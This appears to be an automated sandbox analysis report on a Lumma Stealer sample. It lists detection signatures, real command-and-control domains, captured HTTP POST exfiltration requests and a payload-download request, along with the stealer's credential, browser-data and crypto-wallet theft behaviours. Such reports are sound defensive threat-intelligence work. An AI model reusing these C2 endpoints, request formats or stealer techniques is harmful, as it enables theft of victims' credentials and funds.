Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1560657
MD5: b570fcbe697ef79db835d9b654974874
SHA1: cf82bcfafbd35a42a4cb7893b4acae9941ee9f5a
SHA256: 34255258fadbcfaa0d061722ae85b5e25bcc3b90f2f10825b75d0cb4f27e1a8b
Tags: exeuser-Bitsight
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Contains functionality to register a low level keyboard hook
Drops password protected ZIP file
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables security privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection
barindex
Antivirus detection for URL or domain
Source: https://librari-night.sbs:443/apihv.default-release/key4.dbPK Avira URL Cloud: Label: malware
Source: https://librari-night.sbs:443/apitPK Avira URL Cloud: Label: malware
Source: https://librari-night.sbs/b Avira URL Cloud: Label: malware
Source: https://librari-night.sbs/= Avira URL Cloud: Label: malware
Source: https://librari-night.sbs/apiAA== Avira URL Cloud: Label: malware
Found malware configuration
Source: 11.3.Installer.exe.35f0000.0.unpack Malware Configuration Extractor: LummaC {"C2 url": ["peepburry828.sbs", "processhol.sbs", "3xp3cts1aim.sbs", "p3ar11fter.sbs", "p10tgrace.sbs"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exe ReversingLabs: Detection: 71%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 31%
Source: file.exe Virustotal: Detection: 14% Perma Link
Sample uses string decryption to hide its real strings
Source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmp String decryptor: p3ar11fter.sbs
Source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmp String decryptor: 3xp3cts1aim.sbs
Source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmp String decryptor: peepburry828.sbs
Source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmp String decryptor: p10tgrace.sbs
Source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmp String decryptor: processhol.sbs
Source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmp String decryptor: processhol.sbs
Source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmp String decryptor: TeslaBrowser/5.5
Source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmp String decryptor: - Screen Resoluton:
Source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmp String decryptor: - Physical Installed Memory:
Source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmp String decryptor: Workgroup: -
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_004195D1 CryptUnprotectData, 12_2_004195D1
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040367D GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime, 0_2_0040367D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004031DC FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z, 0_2_004031DC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_00247978 FindFirstFileW,FindFirstFileW,free, 5_2_00247978
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Code function: 11_2_0025A151 FindFirstFileExW, 11_2_0025A151
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_0024881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free, 5_2_0024881C
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\main\extracted Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\main\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx edi, byte ptr [esp+ecx] 12_2_00424800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h 12_2_00441160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx ebx, byte ptr [esp+edx+4B5D9729h] 12_2_0040CA6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx ebp, word ptr [eax] 12_2_004412A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov word ptr [eax], cx 12_2_004195D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx edi, byte ptr [esp+ecx-05h] 12_2_0040BDB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov esi, edx 12_2_00427E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax-69h] 12_2_00427E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov byte ptr [eax], bl 12_2_0040CEF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h] 12_2_00403060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov esi, edx 12_2_00429872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax-532F9054h] 12_2_0040A874
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp eax 12_2_00418940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov ebp, dword ptr [ecx+esi*4-000009BCh] 12_2_00409150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+000011E4h] 12_2_00425150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov ecx, eax 12_2_00425A75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov ecx, eax 12_2_00425A75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax-3DC4CF7Bh] 12_2_004252A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov ecx, eax 12_2_004272A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 6DBC3610h 12_2_0043C310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx edi, byte ptr [esp+eax-29h] 12_2_0041DBD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6Ah] 12_2_0041DBDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx edi, word ptr [edi+ecx*4] 12_2_00407BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then add eax, dword ptr [esp+ecx*4+34h] 12_2_00407BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] 12_2_00407BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h 12_2_0042C470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp dword ptr [00446B78h] 12_2_0041ECF4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h 12_2_00429487
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h 12_2_00423560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then push eax 12_2_00418D27
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h 12_2_00429525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx edx, byte ptr [eax+edi-3EB41192h] 12_2_0042964F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx edi, byte ptr [esp+eax-29h] 12_2_0041DE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx edi, byte ptr [esi+eax+08h] 12_2_0041B634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 12_2_0042BED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx edx, byte ptr [edi+ecx+26702EC9h] 12_2_0041A6A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 12_2_00401F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov esi, edx 12_2_0042975B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then cmp dword ptr [ebx+edi*8], 1B6183F2h 12_2_0043BF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov ecx, edx 12_2_004237C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then movzx edi, byte ptr [esp+esi+04h] 12_2_0043BFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov ebx, edx 12_2_004277BD

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2057658 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (librari-night .sbs) : 192.168.2.5:49817 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.5:49708 -> 172.67.206.172:443
Source: Network traffic Suricata IDS: 2057668 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (processhol .sbs) : 192.168.2.5:63123 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057697 - Severity 1 - ET MALWARE Observed DNS Query to Lumma Stealer Domain (processhol .sbs) : 192.168.2.5:63123 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.5:49710 -> 172.67.206.172:443
Source: Network traffic Suricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.5:49715 -> 172.67.206.172:443
Source: Network traffic Suricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.5:49709 -> 172.67.206.172:443
Source: Network traffic Suricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.5:49723 -> 172.67.206.172:443
Source: Network traffic Suricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.5:49736 -> 172.67.206.172:443
Source: Network traffic Suricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.5:49707 -> 172.67.206.172:443
Source: Network traffic Suricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.5:49712 -> 172.67.206.172:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49707 -> 172.67.206.172:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49707 -> 172.67.206.172:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49708 -> 172.67.206.172:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49708 -> 172.67.206.172:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49715 -> 172.67.206.172:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49736 -> 172.67.206.172:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49723 -> 172.67.206.172:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: peepburry828.sbs
Source: Malware configuration extractor URLs: processhol.sbs
Source: Malware configuration extractor URLs: 3xp3cts1aim.sbs
Source: Malware configuration extractor URLs: p3ar11fter.sbs
Source: Malware configuration extractor URLs: p10tgrace.sbs
Contains functionality to download and execute PE files
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Code function: 11_2_00251280 std::_Xinvalid_argument,GetTickCount,GetTickCount,Sleep,GetTickCount,GetModuleHandleW,GetSystemInfo,FindResourceW,LoadResource,URLDownloadToFileA,ShellExecuteA,GetProcAddress,LockResource,GetProcAddress,VirtualProtect,Concurrency::cancel_current_task, 11_2_00251280
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 172.67.206.172 172.67.206.172
Source: Joe Sandbox View IP Address: 176.9.162.205 176.9.162.205
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 172.67.206.172:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 172.67.206.172:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 172.67.206.172:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 172.67.206.172:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49723 -> 172.67.206.172:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 172.67.206.172:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49736 -> 172.67.206.172:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 172.67.206.172:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: librari-night.sbs
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: librari-night.sbs
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=V31ZB5AUZ1ZALSPCTTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12834Host: librari-night.sbs
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=POBUP2MJIL1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15034Host: librari-night.sbs
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=U4WC6T04TDNKP3M5UHAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20572Host: librari-night.sbs
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AN34G8DXPIQAPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1233Host: librari-night.sbs
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XOQV0YRX0LEO9RK9TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551350Host: librari-night.sbs
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 81Host: librari-night.sbs
Source: global traffic HTTP traffic detected: GET /4Ak49WQH0GE3Nr.mp3 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: joxi.netConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Code function: 11_2_00251280 std::_Xinvalid_argument,GetTickCount,GetTickCount,Sleep,GetTickCount,GetModuleHandleW,GetSystemInfo,FindResourceW,LoadResource,URLDownloadToFileA,ShellExecuteA,GetProcAddress,LockResource,GetProcAddress,VirtualProtect,Concurrency::cancel_current_task, 11_2_00251280
Source: global traffic HTTP traffic detected: GET /4Ak49WQH0GE3Nr.mp3 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: joxi.netConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: joxi.net
Source: global traffic DNS traffic detected: DNS query: processhol.sbs
Source: global traffic DNS traffic detected: DNS query: librari-night.sbs
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: librari-night.sbs
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.4.45Set-Cookie: js=Kjb%2CqXNGWr6qO8OFFfuytA6GbIwRASKgxwp%2CaVFODg3IF0lCGlL3T5hb1EBsxkeemPHDsfJFog2LUGk4F%2C0iJ0; path=/Cache-Control: no-cacheDate: Fri, 22 Nov 2024 04:02:05 GMTVary: Accept-LanguageVary: Accept-LanguageContent-Encoding: gzipData Raw: 33 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 cd 6e 13 31 10 be f7 29 cc 5e 36 41 9b 75 5a 5a 09 c8 6e a4 96 22 24 0e c0 a1 1c 50 55 21 77 d7 d9 75 bb 7f b5 9d a6 51 83 04 05 21 10 48 48 f4 c6 1b 70 4b 0b 85 40 9b 20 f1 04 de 57 e0 49 18 7b 93 14 a9 62 23 d9 b1 e7 9b cf 33 e3 f9 ec 5d 5b 7f 78 67 e3 c9 a3 bb 28 96 69 d2 5e f0 66 13 25 61 7b 01 c1 e7 a5 54 12 14 c4 84 0b 2a 7d ab 2b 3b 8d 9b d6 d4 24 99 4c 68 fb 7e 7e c0 d0 9f e7 c7 a8 7c a9 be aa 89 3a 51 63 35 2c 3f 20 f5 ab 7c 0e cb 2f 30 0e d5 05 fc 86 08 ec e7 60 29 5f a8 9f b0 3b 52 e3 f2 8d 9a 94 47 80 3a 45 6a 84 8c f3 85 3a d3 04 a8 7c 05 6e 3f d4 b9 71 06 db 2f 35 d1 8e 67 00 1f 79 b8 3a ba 8a 30 61 d9 2e 8a 39 ed f8 16 ee 90 7d 16 e4 99 0b 83 85 38 4d 7c 4b c4 39 97 41 57 22 bd 6f 21 d9 2f a8 6f b1 94 44 14 1f 34 cc de bf 34 95 8b ec 27 54 c4 94 4a 6b c6 8b 83 30 73 77 20 53 97 77 31 11 50 0b 81 03 21 f0 72 73 d9 85 19 38 aa 58 44 c0 59 21 2b c6 5a a7 9b 05 92 e5 59 8d 39 c2 c9 9d c8 e1 0e 71 d2 fa 21 db b4 ef e5 79 94 d0 d5 8c 24 7d c9 02 f1 70 7b 87 06 d2 de f2 79 8b 6d f2 2d 5f 0f 83 c1 dc bf 7e 68 08 0d a9 36 b9 7b 06 e1 ee 0d 06 9b 5b 75 b7 e8 8a b8 46 78 d4 4d 69 26 45 fd 99 63 8c 89 bf 78 3d a3 3d b4 4e 24 ad d5 5b c4 17 6e c0 29 2c ee 26 54 03 6b 79 dd 99 d3 6a ea 14 10 11 95 53 b3 58 eb 6f 90 e8 01 49 29 00 37 9b 5b 2d e2 12 d1 cf 02 7f 11 fe 09 1e f8 51 2b 75 0b c2 81 e9 41 1e 52 97 65 82 72 b9 46 3b 39 a7 35 9d a6 e1 7e 56 af f5 58 16 e6 3d 27 cc 03 13 9f 63 57 35 b2 1d 1b e3 5e af e7 46 a6 14 0d 32 ab 85 1b e4 29 be 5c ed 08 40 46 c4 ae b7 aa 12 cf be 88 d4 ec 2a 1f db 41 f6 e3 d5 c6 8d e6 ad 95 e6 d2 cd 66 63 05 36 a0 2c 2d 03 d7 30 4e f7 ba 8c 1b 5c c8 44 91 90 7e 07 fc ba 9c 0a cd 3a 43 09 9a 85 1a 52 40 6b ec 33 da 33 27 7a 78 7a a3 1e 8e 8d 26 16 bc ed 3c ec 83 52 42 b6 8f 58 e8 5b 3d 4e 8a 82 f2 59 17 81 56 12 e8 0f df 4a f2 08 5a 70 da 96 56 db c3 64 da 67 f1 62 1b ba 06 35 b4 1a 86 d0 ea 95 5a ca 17 e5 91 51 ca 58 8d ca d7 5a 2b 63 75 a6 77 5f 96 6f a1 e9 c1 aa 4e 41 60 d0 fe 10 c9 e2 94 4a 14 24 6b ab 8f a0 9b ef 20 92 89 fa 06 4e 93 39 6f f9 4e fd b8 a2 35 d0 19 68 6a 34 97 17 52 27 80 3b af c4 3b 04 13 a8 0f c1 f0 45 13 9d 1a f9 7d 85 e5 79 f9 1e a2 3a 53 17 2e 54 44 9f 5a b5 3b b9 4c 50 1d 1b f0 e9 7f f2 b9 cc 7f ee d3 a1 34 dc 26 c1 ae d5 56 9f 20 f8 31 a4 38 84 87 e1 a8 7c 77 15 1c 4b 59 dc c6 d8 28 30 a3 12 83 90 a1 e1 f5 8b f4 74 3b 21 d9 ae 35 2b 7b 90 17 7d b8 0c 0d 44 bf 3f a3 a5 e6 d2 b2 61 f3 30 5c 98 9e a6 d7 87 cd 4b f7 17 32 0c 27 7f 00 05 Data Ascii: 339uTn1)^6AuZZn"$PU!wuQ!HHpK@ WI{b
Source: Installer.exe.9.dr String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: RegSvcs.exe, 0000000C.00000002.2319086151.0000000000C45000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft.c
